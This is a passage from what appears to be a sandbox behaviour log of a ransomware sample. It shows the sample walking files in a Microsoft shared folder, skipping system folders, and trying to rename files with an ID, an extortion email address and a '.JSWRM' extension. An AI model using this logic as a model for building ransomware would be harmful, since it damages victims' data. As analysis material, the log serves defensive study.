lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.433] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d1d8 [0068.433] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24d1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8, lpNumberOfBytesRead=0x345ec04*=0x0, lpOverlapped=0x0) returned 0 [0068.433] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0068.433] CloseHandle (hObject=0xffffffff) returned 1 [0068.433] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2257f0 [0068.433] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.433] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.433] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.433] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.433] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.433] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.433] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0068.433] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.434] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0068.434] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0068.434] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0068.434] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0068.434] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.434] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsen.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsen.xml"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsen.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsen.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.434] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.434] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2257f0 | out: hHeap=0x1e0000) returned 1 [0068.434] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0068.434] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c940eb6, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7c940eb6, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7c940eb6, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xbd0, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="ipsesp.xml", cAlternateFileName="")) returned 1 [0068.434] lstrcmpiW (lpString1="ipsesp.xml", lpString2=".") returned 1 [0068.434] lstrcmpiW (lpString1="ipsesp.xml", lpString2="..") returned 1 [0068.434] lstrcmpiW (lpString1="ipsesp.xml", lpString2="...") returned 1 [0068.434] lstrcmpiW (lpString1="ipsesp.xml", lpString2="windows") returned -1 [0068.434] lstrcmpiW (lpString1="ipsesp.xml", lpString2="recovery") returned -1 [0068.434] lstrcmpiW (lpString1="ipsesp.xml", lpString2="perflogs") returned -1 [0068.434] lstrcmpiW (lpString1="ipsesp.xml", lpString2="documents and settings") returned 1 [0068.434] lstrcmpiW (lpString1="ipsesp.xml", lpString2="$RECYCLE.BIN") returned 1 [0068.434] lstrcmpiW (lpString1="ipsesp.xml", lpString2="system volume information") returned -1 [0068.434] lstrcmpiW (lpString1="ipsesp.xml", lpString2="msocache") returned -1 [0068.434] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0068.434] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipsesp.xml", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0068.434] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipsesp.xml", cchWideChar=10, lpMultiByteStr=0x345ef40, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ipsesp.xml", lpUsedDefaultChar=0x0) returned 10 [0068.434] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0068.434] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0068.434] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipsesp.xml", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0068.434] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipsesp.xml", cchWideChar=10, lpMultiByteStr=0x345ef10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ipsesp.xml", lpUsedDefaultChar=0x0) returned 10 [0068.434] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0068.434] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224ee8 [0068.434] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0068.434] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.434] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.435] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224dd8 [0068.435] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsesp.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsesp.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.435] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=9656907549789656) returned 0 [0068.435] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.435] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d1d8 [0068.435] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24d1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8, lpNumberOfBytesRead=0x345ec04*=0x0, lpOverlapped=0x0) returned 0 [0068.435] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0068.435] CloseHandle (hObject=0xffffffff) returned 1 [0068.435] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225080 [0068.435] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.435] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.435] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.435] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.435] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.435] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.435] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1e0 [0068.435] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1e0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.435] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1e0 | out: hHeap=0x1e0000) returned 1 [0068.435] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0068.435] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0068.435] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0068.435] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.435] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsesp.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsesp.xml"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsesp.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsesp.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.435] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.435] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225080 | out: hHeap=0x1e0000) returned 1 [0068.435] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224dd8 | out: hHeap=0x1e0000) returned 1 [0068.435] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d14d081, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7d14d081, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7d14d081, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="IPSEventLogMsg.dll", cAlternateFileName="")) returned 1 [0068.435] lstrcmpiW (lpString1="IPSEventLogMsg.dll", lpString2=".") returned 1 [0068.436] lstrcmpiW (lpString1="IPSEventLogMsg.dll", lpString2="..") returned 1 [0068.436] lstrcmpiW (lpString1="IPSEventLogMsg.dll", lpString2="...") returned 1 [0068.436] lstrcmpiW (lpString1="IPSEventLogMsg.dll", lpString2="windows") returned -1 [0068.436] lstrcmpiW (lpString1="IPSEventLogMsg.dll", lpString2="recovery") returned -1 [0068.436] lstrcmpiW (lpString1="IPSEventLogMsg.dll", lpString2="perflogs") returned -1 [0068.436] lstrcmpiW (lpString1="IPSEventLogMsg.dll", lpString2="documents and settings") returned 1 [0068.436] lstrcmpiW (lpString1="IPSEventLogMsg.dll", lpString2="$RECYCLE.BIN") returned 1 [0068.436] lstrcmpiW (lpString1="IPSEventLogMsg.dll", lpString2="system volume information") returned -1 [0068.436] lstrcmpiW (lpString1="IPSEventLogMsg.dll", lpString2="msocache") returned -1 [0068.436] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.436] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IPSEventLogMsg.dll", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0068.436] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0068.436] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IPSEventLogMsg.dll", cchWideChar=18, lpMultiByteStr=0x240f20, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IPSEventLogMsg.dll", lpUsedDefaultChar=0x0) returned 18 [0068.436] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.436] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.436] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IPSEventLogMsg.dll", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0068.436] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0068.436] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IPSEventLogMsg.dll", cchWideChar=18, lpMultiByteStr=0x2412e0, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IPSEventLogMsg.dll", lpUsedDefaultChar=0x0) returned 18 [0068.436] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.436] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0068.436] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224ee8 | out: hHeap=0x1e0000) returned 1 [0068.436] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0068.436] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0068.436] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d100bae, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7d100bae, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7d126e12, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xa62, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="ipsfin.xml", cAlternateFileName="")) returned 1 [0068.436] lstrcmpiW (lpString1="ipsfin.xml", lpString2=".") returned 1 [0068.436] lstrcmpiW (lpString1="ipsfin.xml", lpString2="..") returned 1 [0068.436] lstrcmpiW (lpString1="ipsfin.xml", lpString2="...") returned 1 [0068.436] lstrcmpiW (lpString1="ipsfin.xml", lpString2="windows") returned -1 [0068.436] lstrcmpiW (lpString1="ipsfin.xml", lpString2="recovery") returned -1 [0068.436] lstrcmpiW (lpString1="ipsfin.xml", lpString2="perflogs") returned -1 [0068.436] lstrcmpiW (lpString1="ipsfin.xml", lpString2="documents and settings") returned 1 [0068.436] lstrcmpiW (lpString1="ipsfin.xml", lpString2="$RECYCLE.BIN") returned 1 [0068.436] lstrcmpiW (lpString1="ipsfin.xml", lpString2="system volume information") returned -1 [0068.436] lstrcmpiW (lpString1="ipsfin.xml", lpString2="msocache") returned -1 [0068.437] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0068.437] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipsfin.xml", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0068.437] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipsfin.xml", cchWideChar=10, lpMultiByteStr=0x345ef40, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ipsfin.xml", lpUsedDefaultChar=0x0) returned 10 [0068.437] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0068.437] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0068.437] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipsfin.xml", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0068.437] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipsfin.xml", cchWideChar=10, lpMultiByteStr=0x345ef10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ipsfin.xml", lpUsedDefaultChar=0x0) returned 10 [0068.437] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0068.437] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2252a0 [0068.437] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0068.437] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.437] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.437] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224ee8 [0068.437] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsfin.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfin.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.437] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=9660996358655720) returned 0 [0068.437] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.437] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d1d8 [0068.437] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24d1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8, lpNumberOfBytesRead=0x345ec04*=0x0, lpOverlapped=0x0) returned 0 [0068.437] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0068.437] CloseHandle (hObject=0xffffffff) returned 1 [0068.437] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225108 [0068.437] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.437] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.437] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.437] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.437] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.437] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.437] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a228 [0068.437] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a228, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.437] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a228 | out: hHeap=0x1e0000) returned 1 [0068.437] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0068.438] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0068.438] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0068.438] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.438] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsfin.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfin.xml"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsfin.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfin.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.438] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.438] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225108 | out: hHeap=0x1e0000) returned 1 [0068.438] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224ee8 | out: hHeap=0x1e0000) returned 1 [0068.438] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c940eb6, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7c940eb6, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7c940eb6, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xa44, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="ipsfra.xml", cAlternateFileName="")) returned 1 [0068.438] lstrcmpiW (lpString1="ipsfra.xml", lpString2=".") returned 1 [0068.438] lstrcmpiW (lpString1="ipsfra.xml", lpString2="..") returned 1 [0068.438] lstrcmpiW (lpString1="ipsfra.xml", lpString2="...") returned 1 [0068.438] lstrcmpiW (lpString1="ipsfra.xml", lpString2="windows") returned -1 [0068.438] lstrcmpiW (lpString1="ipsfra.xml", lpString2="recovery") returned -1 [0068.438] lstrcmpiW (lpString1="ipsfra.xml", lpString2="perflogs") returned -1 [0068.438] lstrcmpiW (lpString1="ipsfra.xml", lpString2="documents and settings") returned 1 [0068.438] lstrcmpiW (lpString1="ipsfra.xml", lpString2="$RECYCLE.BIN") returned 1 [0068.438] lstrcmpiW (lpString1="ipsfra.xml", lpString2="system volume information") returned -1 [0068.438] lstrcmpiW (lpString1="ipsfra.xml", lpString2="msocache") returned -1 [0068.438] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0068.438] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipsfra.xml", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0068.438] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipsfra.xml", cchWideChar=10, lpMultiByteStr=0x345ef40, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ipsfra.xml", lpUsedDefaultChar=0x0) returned 10 [0068.438] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0068.438] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0068.438] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipsfra.xml", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0068.438] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipsfra.xml", cchWideChar=10, lpMultiByteStr=0x345ef10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ipsfra.xml", lpUsedDefaultChar=0x0) returned 10 [0068.438] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0068.438] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0068.438] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2252a0 | out: hHeap=0x1e0000) returned 1 [0068.438] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.438] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.438] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0068.438] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsfra.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfra.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.439] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345ebf8 | out: 